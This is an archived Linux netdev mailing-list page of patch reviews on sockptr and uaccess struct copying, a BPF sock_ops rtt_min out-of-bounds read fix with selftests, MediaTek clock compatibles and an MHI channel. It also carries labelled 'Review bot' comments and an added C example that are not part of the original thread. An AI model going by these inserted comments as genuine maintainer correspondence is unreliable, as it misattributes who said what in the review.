> +	ret = request_threaded_irq(dev->irq, NULL,
> +				   ks->no_bh_in_irq_handler ?
> +				   ks8851_irq_nobh : ks8851_irq,

This works, but wouldn't it be simpler to put the BH disable
into the PAR lock/unlock directly?

   static void ks8851_lock_par(...)
   {
       local_bh_disable();
       spin_lock_irqsave(&ksp->lock, *flags);
   }

   static void ks8851_unlock_par(...)
   {
       spin_unlock_irqrestore(&ksp->lock, *flags);
       local_bh_enable();
   }

No flag, no wrapper, no conditional in request_threaded_irq.
And it protects all PAR lock/unlock callsites, not just the
IRQ handler.

> [...]

Regards
Nicolai

Tested-by: Nicolai Buchwitz <nb@tipi-net.de>  # KS8851 SPI, non-RT

^ permalink raw reply

* Re: [PATCH 2/5] sockptr: fix usize check in copy_struct_from_sockptr() for user pointers
From: Aleksa Sarai @ 2026-04-09  6:39 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <2026-04-09-carried-furtive-washer-brail-mNQ6oV@cyphar.com>

On 2026-04-09, Aleksa Sarai <cyphar@cyphar.com> wrote:
> On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> > copy_struct_from_user will never hit the check_zeroed_user() call
> > and will never return -E2BIG if new userspace passed new bits in a
> > larger structure than the current kernel structure.
> > 
> > As far as I can see there are no critical/related uapi changes in
> > 
> > - include/net/bluetooth/bluetooth.h and net/bluetooth/sco.c
> >   after the use of copy_struct_from_sockptr in v6.13-rc3
> > - include/uapi/linux/tcp.h and net/ipv4/tcp_ao.c
> >   after the use of copy_struct_from_sockptr in v6.6-rc1
> > 
> > So that new callers will get the correct behavior from the start.
> > 
> > Fixes: 4954f17ddefc ("net/tcp: Introduce TCP_AO setsockopt()s")
> > Fixes: ef84703a911f ("net/tcp: Add TCP-AO getsockopt()s")
> > Fixes: faadfaba5e01 ("net/tcp: Add TCP_AO_REPAIR")
> > Fixes: 3e643e4efa1e ("Bluetooth: Improve setsockopt() handling of malformed user input")
> > Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> > Cc: Dmitry Safonov <dima@arista.com>
> > Cc: Francesco Ruggeri <fruggeri@arista.com>
> > Cc: Salam Noureddine <noureddine@arista.com>
> > Cc: David Ahern <dsahern@kernel.org>
> > Cc: David S. Miller <davem@davemloft.net>
> > Cc: Michal Luczaj <mhal@rbox.co>
> > Cc: David Wei <dw@davidwei.uk>
> > Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> > Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> > Cc: Marcel Holtmann <marcel@holtmann.org>
> > Cc: Xin Long <lucien.xin@gmail.com>
> > Cc: Eric Dumazet <edumazet@google.com>
> > Cc: Kuniyuki Iwashima <kuniyu@google.com>
> > Cc: Paolo Abeni <pabeni@redhat.com>
> > Cc: Willem de Bruijn <willemb@google.com>
> > Cc: Neal Cardwell <ncardwell@google.com>
> > Cc: Jakub Kicinski <kuba@kernel.org>
> > Cc: Simon Horman <horms@kernel.org>
> > Cc: Aleksa Sarai <cyphar@cyphar.com>
> > Cc: Christian Brauner <brauner@kernel.org>
> > CC: Kees Cook <keescook@chromium.org>
> > Cc: netdev@vger.kernel.org
> > Cc: linux-bluetooth@vger.kernel.org
> > Cc: linux-kernel@vger.kernel.org
> > Signed-off-by: Stefan Metzmacher <metze@samba.org>
> > ---
> >  include/linux/sockptr.h | 2 +-
> >  1 file changed, 1 insertion(+), 1 deletion(-)
> > 
> > diff --git a/include/linux/sockptr.h b/include/linux/sockptr.h
> > index 3e6c8e9d67ae..ba88f4d78c1b 100644
> > --- a/include/linux/sockptr.h
> > +++ b/include/linux/sockptr.h
> > @@ -91,7 +91,7 @@ static inline int copy_struct_from_sockptr(void *dst, size_t ksize,
> >  	size_t rest = max(ksize, usize) - size;
> >  
> >  	if (!sockptr_is_kernel(src))
> > -		return copy_struct_from_user(dst, ksize, src.user, size);
> > +		return copy_struct_from_user(dst, ksize, src.user, usize);
> >  
> >  	if (usize < ksize) {
> >  		memset(dst + size, 0, rest);
> 
> It is a little weird that this function open-codes memchr_inv() --
> check_zeroed_sockptr() exists and does the right thing. Maybe it'd be
> nice to fix that too?

Ah my bad, I didn't see that you already fixed this in patch #4.

> In any case,
> 
> Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

-- 
Aleksa Sarai
https://www.cyphar.com/

^ permalink raw reply

* Re: [PATCH 2/5] sockptr: fix usize check in copy_struct_from_sockptr() for user pointers
From: Aleksa Sarai @ 2026-04-09  6:37 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <cfaedbc33ae9d36adaabf04fa79424f30ff1efdd.1775576651.git.metze@samba.org>

On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> copy_struct_from_user will never hit the check_zeroed_user() call
> and will never return -E2BIG if new userspace passed new bits in a
> larger structure than the current kernel structure.
> 
> As far as I can see there are no critical/related uapi changes in
> 
> - include/net/bluetooth/bluetooth.h and net/bluetooth/sco.c
>   after the use of copy_struct_from_sockptr in v6.13-rc3
> - include/uapi/linux/tcp.h and net/ipv4/tcp_ao.c
>   after the use of copy_struct_from_sockptr in v6.6-rc1
> 
> So that new callers will get the correct behavior from the start.
> 
> Fixes: 4954f17ddefc ("net/tcp: Introduce TCP_AO setsockopt()s")
> Fixes: ef84703a911f ("net/tcp: Add TCP-AO getsockopt()s")
> Fixes: faadfaba5e01 ("net/tcp: Add TCP_AO_REPAIR")
> Fixes: 3e643e4efa1e ("Bluetooth: Improve setsockopt() handling of malformed user input")
> Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> Cc: Dmitry Safonov <dima@arista.com>
> Cc: Francesco Ruggeri <fruggeri@arista.com>
> Cc: Salam Noureddine <noureddine@arista.com>
> Cc: David Ahern <dsahern@kernel.org>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Michal Luczaj <mhal@rbox.co>
> Cc: David Wei <dw@davidwei.uk>
> Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> Cc: Marcel Holtmann <marcel@holtmann.org>
> Cc: Xin Long <lucien.xin@gmail.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Cc: Kuniyuki Iwashima <kuniyu@google.com>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Willem de Bruijn <willemb@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Simon Horman <horms@kernel.org>
> Cc: Aleksa Sarai <cyphar@cyphar.com>
> Cc: Christian Brauner <brauner@kernel.org>
> CC: Kees Cook <keescook@chromium.org>
> Cc: netdev@vger.kernel.org
> Cc: linux-bluetooth@vger.kernel.org
> Cc: linux-kernel@vger.kernel.org
> Signed-off-by: Stefan Metzmacher <metze@samba.org>
> ---
>  include/linux/sockptr.h | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/include/linux/sockptr.h b/include/linux/sockptr.h
> index 3e6c8e9d67ae..ba88f4d78c1b 100644
> --- a/include/linux/sockptr.h
> +++ b/include/linux/sockptr.h
> @@ -91,7 +91,7 @@ static inline int copy_struct_from_sockptr(void *dst, size_t ksize,
>  	size_t rest = max(ksize, usize) - size;
>  
>  	if (!sockptr_is_kernel(src))
> -		return copy_struct_from_user(dst, ksize, src.user, size);
> +		return copy_struct_from_user(dst, ksize, src.user, usize);
>  
>  	if (usize < ksize) {
>  		memset(dst + size, 0, rest);
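Review bot: with usize passed through on the '+' line, the user-pointer branch can now return -E2BIG for a larger struct whose trailing bytes are non-zero, which the '-' line could never do because it handed copy_struct_from_user() the already-clamped size. That is a user-visible behaviour change for the existing setsockopt callers named in the commit message, so a selftest sending usize > ksize with a non-zero tail would document and pin it.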

It is a little weird that this function open-codes memchr_inv() --
check_zeroed_sockptr() exists and does the right thing. Maybe it'd be
nice to fix that too?

In any case,

Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

-- 
Aleksa Sarai
https://www.cyphar.com/

^ permalink raw reply
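
Added example, not part of the thread or of the kernel source: a userspace model of the extensible-struct copy rule discussed above, showing why passing the clamped size instead of usize hides non-zero trailing bytes from the -E2BIG check. The struct names, model_copy_struct() and the two user_branch_*() wrappers are hypothetical; memcpy stands in for the user copy.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample structs: v1 is what the "kernel" knows,
 * v2 is what a newer "userspace" sends. */
struct opt_v1 { uint32_t flags; };
struct opt_v2 { uint32_t flags; uint32_t extra; };

/*
 * Model of the copy rule for extensible structs:
 *  - usize < ksize: copy usize bytes, zero-fill the rest of dst
 *  - usize > ksize: trailing (usize - ksize) bytes must be zero, else -E2BIG
 */
static int model_copy_struct(void *dst, size_t ksize,
                             const void *src, size_t usize)
{
    size_t size = ksize < usize ? ksize : usize;
    size_t rest = (ksize > usize ? ksize : usize) - size;

    if (usize < ksize) {
        memset((char *)dst + size, 0, rest);
    } else if (usize > ksize) {
        const unsigned char *tail = (const unsigned char *)src + size;

        for (size_t i = 0; i < rest; i++)
            if (tail[i])
                return -E2BIG;
    }
    memcpy(dst, src, size);
    return 0;
}

/* Mirrors the '-' line: the caller clamps first, so the callee always
 * sees usize <= ksize and the trailing-bytes check is unreachable. */
static int user_branch_before(void *dst, size_t ksize,
                              const void *src, size_t usize)
{
    size_t size = ksize < usize ? ksize : usize;

    return model_copy_struct(dst, ksize, src, size);
}

/* Mirrors the '+' line: the real usize reaches the check. */
static int user_branch_after(void *dst, size_t ksize,
                             const void *src, size_t usize)
{
    return model_copy_struct(dst, ksize, src, usize);
}

/* Newer userspace (v2) talking to an older kernel (v1). */
static int try_v2(int fixed, uint32_t extra)
{
    struct opt_v2 u = { .flags = 1, .extra = extra };
    struct opt_v1 k = { 0 };

    return fixed ? user_branch_after(&k, sizeof(k), &u, sizeof(u))
                 : user_branch_before(&k, sizeof(k), &u, sizeof(u));
}

/* Older userspace (v1) talking to a newer kernel (v2): the field the
 * caller did not supply must come out zeroed. Returns 1 on success. */
static int old_user_zero_fill(void)
{
    struct opt_v1 u = { .flags = 5 };
    struct opt_v2 k = { .flags = 0xffffffffu, .extra = 0xffffffffu };

    if (user_branch_after(&k, sizeof(k), &u, sizeof(u)) != 0)
        return 0;
    return k.flags == 5 && k.extra == 0;
}

int main(void)
{
    printf("before, extra=7: %d\n", try_v2(0, 7)); /* silently accepted */
    printf("after,  extra=7: %d\n", try_v2(1, 7)); /* rejected */
    printf("after,  extra=0: %d\n", try_v2(1, 0)); /* accepted */
    printf("zero fill ok:    %d\n", old_user_zero_fill());
    return 0;
}
```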

* Re: [PATCH 1/5] uaccess: fix ignored_trailing logic in copy_struct_to_user()
From: Aleksa Sarai @ 2026-04-09  6:33 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <71f69442410c1186ed8ce6d5b4b9d4a5a70edbad.1775576651.git.metze@samba.org>

On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> Currently all callers pass ignored_trailing=NULL, but I have
> code that will make use of it.
> 
> Now it actually behaves like documented:
> 
> * If @usize < @ksize, then the kernel is trying to pass userspace a newer
>   struct than it supports. Thus we only copy the interoperable portions
>   (@usize) and ignore the rest (but @ignored_trailing is set to %true if
>   any of the trailing (@ksize - @usize) bytes are non-zero).

Good catch, though I want to mention that the current API design for
copy_struct_to_user() is a bit of a compromise -- I was trying to think
of a way of making it generic but what information you need really
depends on your API.

For request-flag APIs (like statx) then you can just unset the bits in
the response mask for fields past usize and so it is a non-fatal error,
but it requires knowing which field offsets map to which flags.

My initial idea for ignored_trailing was for it to return the offset
memchr_inv() gives you -- but unfortunately, this doesn't help in the
more generic case where you have multiple non-zero bits that need to
unset multiple flags.

Out of interest, how did you plan on using it? It might be a good idea
to rethink this API before it starts getting used "in anger" in a way
that leaks to uAPIs we can't change.

In any case, for this patch feel free to take my

Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

> Fixes: 424a55a4a908 ("uaccess: add copy_struct_to_user helper")
> Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> Cc: Dmitry Safonov <dima@arista.com>
> Cc: Francesco Ruggeri <fruggeri@arista.com>
> Cc: Salam Noureddine <noureddine@arista.com>
> Cc: David Ahern <dsahern@kernel.org>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Michal Luczaj <mhal@rbox.co>
> Cc: David Wei <dw@davidwei.uk>
> Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> Cc: Marcel Holtmann <marcel@holtmann.org>
> Cc: Xin Long <lucien.xin@gmail.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Cc: Kuniyuki Iwashima <kuniyu@google.com>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Willem de Bruijn <willemb@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Simon Horman <horms@kernel.org>
> Cc: Aleksa Sarai <cyphar@cyphar.com>
> Cc: Christian Brauner <brauner@kernel.org>
> CC: Kees Cook <keescook@chromium.org>
> Cc: netdev@vger.kernel.org
> Cc: linux-bluetooth@vger.kernel.org
> Cc: linux-kernel@vger.kernel.org
> Signed-off-by: Stefan Metzmacher <metze@samba.org>
> ---
>  include/linux/uaccess.h | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
> index 4fe63169d5a2..1234b5fa4761 100644
> --- a/include/linux/uaccess.h
> +++ b/include/linux/uaccess.h
> @@ -505,7 +505,7 @@ copy_struct_to_user(void __user *dst, size_t usize, const void *src,
>  			return -EFAULT;
>  	}
>  	if (ignored_trailing)
> -		*ignored_trailing = ksize < usize &&
> +		*ignored_trailing = usize < ksize &&
>  			memchr_inv(src + size, 0, rest) != NULL;
>  	/* Copy the interoperable parts of the struct. */
>  	if (copy_to_user(dst, src, size))
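Review bot: the corrected condition usize < ksize has no caller exercising it, since the commit message says every caller currently passes ignored_trailing=NULL, which is how the inverted comparison went unnoticed. A KUnit case with usize < ksize and a single non-zero byte in the trailing ksize - usize region, asserting that *ignored_trailing comes back true, would keep the comparison from regressing.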
> -- 
> 2.43.0
> 

-- 
Aleksa Sarai
https://www.cyphar.com/

^ permalink raw reply

* Re: [PATCH v5 23/27] clk: mediatek: Add MT8196 disp-ao clock support
From: Jason-JH Lin (林睿祥) @ 2026-04-09  6:30 UTC (permalink / raw)
  To: aford173@gmail.com
  Cc: Guangjie Song (宋光杰), robh@kernel.org,
	kernel@collabora.com, Sirius Wang (王皓昱),
	Nancy Lin (林欣螢), AngeloGioacchino Del Regno,
	linux-mediatek@lists.infradead.org, conor+dt@kernel.org,
	mturquette@baylibre.com, richardcochran@gmail.com,
	Project_Global_Chrome_Upstream_Group, devicetree@vger.kernel.org,
	linux-kernel@vger.kernel.org, krzk+dt@kernel.org, Laura Nao,
	Nicolas Prado, p.zabel@pengutronix.de,
	Singo Chang (張興國),
	Paul-pl Chen (陳柏霖), wenst@chromium.org,
	linux-arm-kernel@lists.infradead.org, netdev@vger.kernel.org,
	linux-clk@vger.kernel.org, matthias.bgg@gmail.com,
	sboyd@kernel.org
In-Reply-To: <CAHCN7x+K25H-QWLDA6SoGSzxv9koO0wFOrjfWNePc+0AfjCVZg@mail.gmail.com>

> 
[snip]

> > > > > +static const struct of_device_id
> > > > > of_match_clk_mt8196_vdisp_ao[]
> > > > > = {
> > > > > + { .compatible = "mediatek,mt8196-vdisp-ao", .data =
> > > > > &mm_v_mcd },
> > > > 
> > > > Hi Laura,
> > > > 
> > > > > We are going to send mtk-mmsys driver for MT8196 recently, but we
> > > > > found the compatible name is used here.
> > > > > 
> > > > > As your commit message, vdisp-ao is integrated with the mtk-mmsys
> > > > > driver, which registers the vdisp-ao clock driver via
> > > > > platform_device_register_data().
> > > > > 
> > > > > Shouldn't this compatible name belong to mmsys driver for MT8196?
> > > > > 
> > > > 
> > > > That's right, my fault for missing that! Thanks for the heads up.
> > > > 
> > > > I'm aware Angelo is currently restructuring mediatek-drm (including
> > > > mmsys and mutex), and that might affect the way vdisp-ao is loaded
> > > > too. So I'm not sure whether it makes sense to send a patch to fix
> > > > this right away.
> > 
> > OK, we'll try to contact Angelo from other places.
> > Thanks for your confirmation!
> > 
> 
> 
> If anyone wants me to test anything, I have a Chromebook with the
> mt8196 that I can test code, so feel free to CC me on anything that
> you want tested.  I'd love to see this stuff pushed upstream.
> 
> thanks
> 
> adam 

Hi Adam,
However, we still need some more time to discuss and refactor this.
We'll send the new patch if necessary.
Thank you for your help!

Regards,
Jason-JH Lin

> > 
> > Regards,
> > Jason-JH.Lin
> > 
> > > 
> > > Best,
> > > 
> > > Laura
> > > 
> > 


^ permalink raw reply

* [PATCH v2] bpf: guard sock_ops rtt_min access with is_locked_tcp_sock
From: Werner Kasselman @ 2026-04-09  6:10 UTC (permalink / raw)
  To: Martin KaFai Lau
  Cc: Alexei Starovoitov, Daniel Borkmann, Andrii Nakryiko,
	John Fastabend, David S . Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Shuah Khan, bpf@vger.kernel.org,
	netdev@vger.kernel.org, linux-kernel@vger.kernel.org,
	linux-kselftest@vger.kernel.org, stable@vger.kernel.org,
	Werner Kasselman
In-Reply-To: <20260406224953.2787289-1-werner@verivus.com>

sock_ops_convert_ctx_access() emits guarded reads for tcp_sock-backed
bpf_sock_ops fields such as snd_cwnd, srtt_us, snd_ssthresh, rcv_nxt,
snd_nxt, snd_una, mss_cache, ecn_flags, rate_delivered, and
rate_interval_us. Those accesses go through SOCK_OPS_GET_TCP_SOCK_FIELD(),
which checks is_locked_tcp_sock before dereferencing sock_ops.sk.

The rtt_min case is different. Because it reads a subfield of
struct minmax, it uses a custom open-coded load sequence instead of the
usual helper macro, and that sequence currently dereferences sock_ops.sk
without checking is_locked_tcp_sock first.

This is unsafe when sock_ops.sk points to a request_sock-backed object
instead of a locked full tcp_sock. That is reachable not only from the
SYNACK header option callbacks, but also from other request_sock-backed
sock_ops callbacks such as BPF_SOCK_OPS_TIMEOUT_INIT,
BPF_SOCK_OPS_RWND_INIT, and BPF_SOCK_OPS_NEEDS_ECN. In those cases,
reading ctx->rtt_min makes the generated code treat a request_sock as a
tcp_sock and read beyond the end of the request_sock allocation.

Fix the rtt_min conversion by adding the same is_locked_tcp_sock guard
used for the other tcp_sock field reads. Also make the accessed subfield
explicit by using offsetof(struct minmax_sample, v).

Add a selftest that verifies request_sock-backed sock_ops callbacks see
ctx->rtt_min as zero after the fix.

Found via AST-based call-graph analysis using sqry.

Fixes: 44f0e43037d3 ("bpf: Add support for reading sk_state and more")
Cc: stable@vger.kernel.org
Signed-off-by: Werner Kasselman <werner@verivus.com>
---
 net/core/filter.c                             | 53 +++++++++++++++----
 .../selftests/bpf/prog_tests/tcpbpf_user.c    |  9 ++++
 .../selftests/bpf/progs/test_tcpbpf_kern.c    | 21 ++++++++
 tools/testing/selftests/bpf/test_tcpbpf.h     |  6 +++
 4 files changed, 79 insertions(+), 10 deletions(-)

diff --git a/net/core/filter.c b/net/core/filter.c
index 78b548158..5040bf7e4 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -10827,16 +10827,49 @@ static u32 sock_ops_convert_ctx_access(enum bpf_access_type type,
 	case offsetof(struct bpf_sock_ops, rtt_min):
 		BUILD_BUG_ON(sizeof_field(struct tcp_sock, rtt_min) !=
 			     sizeof(struct minmax));
-		BUILD_BUG_ON(sizeof(struct minmax) <
-			     sizeof(struct minmax_sample));
-
-		*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
-						struct bpf_sock_ops_kern, sk),
-				      si->dst_reg, si->src_reg,
-				      offsetof(struct bpf_sock_ops_kern, sk));
-		*insn++ = BPF_LDX_MEM(BPF_W, si->dst_reg, si->dst_reg,
-				      offsetof(struct tcp_sock, rtt_min) +
-				      sizeof_field(struct minmax_sample, t));
+		BUILD_BUG_ON(sizeof_field(struct bpf_sock_ops, rtt_min) !=
+			     sizeof_field(struct minmax_sample, v));
+		off = offsetof(struct tcp_sock, rtt_min) +
+		      offsetof(struct minmax_sample, v);
+
+		{
+			int fullsock_reg = si->dst_reg, reg = BPF_REG_9, jmp = 2;
+
+			if (si->dst_reg == reg || si->src_reg == reg)
+				reg--;
+			if (si->dst_reg == reg || si->src_reg == reg)
+				reg--;
+			if (si->dst_reg == si->src_reg) {
+				*insn++ = BPF_STX_MEM(BPF_DW, si->src_reg, reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+				fullsock_reg = reg;
+				jmp += 2;
+			}
+			*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
+							struct bpf_sock_ops_kern,
+							is_locked_tcp_sock),
+					      fullsock_reg, si->src_reg,
+					      offsetof(struct bpf_sock_ops_kern,
+						       is_locked_tcp_sock));
+			*insn++ = BPF_JMP_IMM(BPF_JEQ, fullsock_reg, 0, jmp);
+			if (si->dst_reg == si->src_reg)
+				*insn++ = BPF_LDX_MEM(BPF_DW, reg, si->src_reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+			*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
+							struct bpf_sock_ops_kern, sk),
+					      si->dst_reg, si->src_reg,
+					      offsetof(struct bpf_sock_ops_kern, sk));
+			*insn++ = BPF_LDX_MEM(BPF_W, si->dst_reg, si->dst_reg,
+					      off);
+			if (si->dst_reg == si->src_reg) {
+				*insn++ = BPF_JMP_A(1);
+				*insn++ = BPF_LDX_MEM(BPF_DW, reg, si->src_reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+			}
+		}
 		break;
 
 	case offsetof(struct bpf_sock_ops, bpf_sock_ops_cb_flags):
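Review bot: In the `si->dst_reg == si->src_reg` branch, the not-locked path does not produce zero: `is_locked_tcp_sock` is loaded into the scratch `reg`, and `BPF_JMP_IMM(BPF_JEQ, fullsock_reg, 0, jmp)` with `jmp` equal to 4 lands on the final restore of `reg`, so `si->dst_reg` is never written and still holds the ctx pointer. That does not match the commit message's statement that request_sock-backed callbacks see `ctx->rtt_min` as zero, in the case where the same register is used as source and destination. Consider emitting an explicit `BPF_MOV64_IMM(si->dst_reg, 0)` on that path. Since this block repeats the guard sequence the message attributes to SOCK_OPS_GET_TCP_SOCK_FIELD(), factoring out the shared part would also let such a fix land in one place.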
diff --git a/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c b/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
index 7e8fe1bad..d243d6713 100644
--- a/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
+++ b/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
@@ -42,6 +42,15 @@ static void verify_result(struct tcpbpf_globals *result)
 	/* check getsockopt for window_clamp */
 	ASSERT_EQ(result->window_clamp_client, 9216, "window_clamp_client");
 	ASSERT_EQ(result->window_clamp_server, 9216, "window_clamp_server");
+
+	ASSERT_EQ(result->timeout_init_req_seen, 1, "timeout_init_req_seen");
+	ASSERT_EQ(result->timeout_init_req_rtt_min, 0, "timeout_init_req_rtt_min");
+
+	ASSERT_EQ(result->rwnd_init_req_seen, 1, "rwnd_init_req_seen");
+	ASSERT_EQ(result->rwnd_init_req_rtt_min, 0, "rwnd_init_req_rtt_min");
+
+	ASSERT_EQ(result->needs_ecn_req_seen, 1, "needs_ecn_req_seen");
+	ASSERT_EQ(result->needs_ecn_req_rtt_min, 0, "needs_ecn_req_rtt_min");
 }
 
 static void run_test(struct tcpbpf_globals *result)
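Review bot: The three `*_req_rtt_min` assertions compare against 0, which an unguarded read would also satisfy whenever the bytes past the request_sock happen to be zero, so these checks can pass on a kernel without the fix. Say so in a comment here, or note in the commit message that the test was confirmed to fail on an unfixed kernel (for example under KASAN), so the test's actual coverage is clear.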
diff --git a/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c b/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
index 6935f32ee..79757a19b 100644
--- a/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
+++ b/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
@@ -85,6 +85,27 @@ int bpf_testcb(struct bpf_sock_ops *skops)
 	global.event_map |= (1 << op);
 
 	switch (op) {
+	case BPF_SOCK_OPS_TIMEOUT_INIT:
+		if (!skops->is_fullsock) {
+			global.timeout_init_req_seen = 1;
+			global.timeout_init_req_rtt_min = skops->rtt_min;
+		}
+		rv = -1;
+		break;
+	case BPF_SOCK_OPS_RWND_INIT:
+		if (!skops->is_fullsock) {
+			global.rwnd_init_req_seen = 1;
+			global.rwnd_init_req_rtt_min = skops->rtt_min;
+		}
+		rv = 0;
+		break;
+	case BPF_SOCK_OPS_NEEDS_ECN:
+		if (!skops->is_fullsock) {
+			global.needs_ecn_req_seen = 1;
+			global.needs_ecn_req_rtt_min = skops->rtt_min;
+		}
+		rv = 0;
+		break;
 	case BPF_SOCK_OPS_TCP_CONNECT_CB:
 		rv = bpf_setsockopt(skops, SOL_TCP, TCP_WINDOW_CLAMP,
 				    &window_clamp, sizeof(window_clamp));
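Review bot: Each new case stores `skops->rtt_min` into `global.*_req_rtt_min` with a plain assignment, so if a callback fires more than once for request socks only the last read is kept and an earlier non-zero value is lost before `verify_result()` checks it. Accumulating instead, e.g. `global.timeout_init_req_rtt_min |= skops->rtt_min;`, keeps any non-zero read visible. The return values (`rv = -1` for BPF_SOCK_OPS_TIMEOUT_INIT, `rv = 0` for the other two) are set for full sockets as well and deserve a short comment on why they were chosen.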
diff --git a/tools/testing/selftests/bpf/test_tcpbpf.h b/tools/testing/selftests/bpf/test_tcpbpf.h
index 9dd9b5590..46500c1d6 100644
--- a/tools/testing/selftests/bpf/test_tcpbpf.h
+++ b/tools/testing/selftests/bpf/test_tcpbpf.h
@@ -18,5 +18,11 @@ struct tcpbpf_globals {
 	__u32 tcp_saved_syn;
 	__u32 window_clamp_client;
 	__u32 window_clamp_server;
+	__u32 timeout_init_req_seen;
+	__u32 timeout_init_req_rtt_min;
+	__u32 rwnd_init_req_seen;
+	__u32 rwnd_init_req_rtt_min;
+	__u32 needs_ecn_req_seen;
+	__u32 needs_ecn_req_rtt_min;
 };
 #endif
-- 
2.43.0


^ permalink raw reply related

* [PATCH v10 2/2] net: mhi: Add IP_SW1 interface for M-plane support over MHI
From: Vivek Pernamitta @ 2026-04-09  6:08 UTC (permalink / raw)
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni
  Cc: netdev, linux-kernel, Vivek Pernamitta
In-Reply-To: <20260409-vdev_b1_eth_b1_next-20260408-v10-0-6d44ca48f189@oss.qualcomm.com>

Introduce the IP_SW1 channel to represent the network interface
exposed by the MHI device for M-plane communication. The driver
creates a corresponding netdev, allowing the host to access the
device network interface over MHI.

This interface enables support for O-RAN M-plane management
between O-DU and O-RU, including capability exchange, configuration
management, performance monitoring, and fault management using
NETCONF/YANG, as defined by O-RAN WG4 M-plane specifications.

Signed-off-by: Vivek Pernamitta <vivek.pernamitta@oss.qualcomm.com>
---
 drivers/net/mhi_net.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/mhi_net.c b/drivers/net/mhi_net.c
index 47b8617de027980a69c57261a9b4bcefc828dc96..e285aa289cb945cd1afd2f3d581214f2f2f15145 100644
--- a/drivers/net/mhi_net.c
+++ b/drivers/net/mhi_net.c
@@ -430,6 +430,7 @@ static const struct mhi_device_id mhi_net_id_table[] = {
 	{ .chan = "IP_HW0", .driver_data = (kernel_ulong_t)&mhi_hwip0 },
 	/* Software data PATH (to modem CPU) */
 	{ .chan = "IP_SW0", .driver_data = (kernel_ulong_t)&mhi_swip0 },
+	{ .chan = "IP_SW1", .driver_data = (kernel_ulong_t)&mhi_swip0 },
 	{ .chan = "IP_ETH0", .driver_data = (kernel_ulong_t)&mhi_eth0 },
 	{ .chan = "IP_ETH1", .driver_data = (kernel_ulong_t)&mhi_eth0 },
 	{}
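Review bot: The new `IP_SW1` entry sits under the existing "Software data PATH (to modem CPU)" comment and reuses `&mhi_swip0`, while the commit message describes it as an O-RAN M-plane management interface. Add a comment on the entry saying so, and state in the commit message why sharing the `mhi_swip0` driver data with `IP_SW0` is correct for this channel rather than defining a dedicated one.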

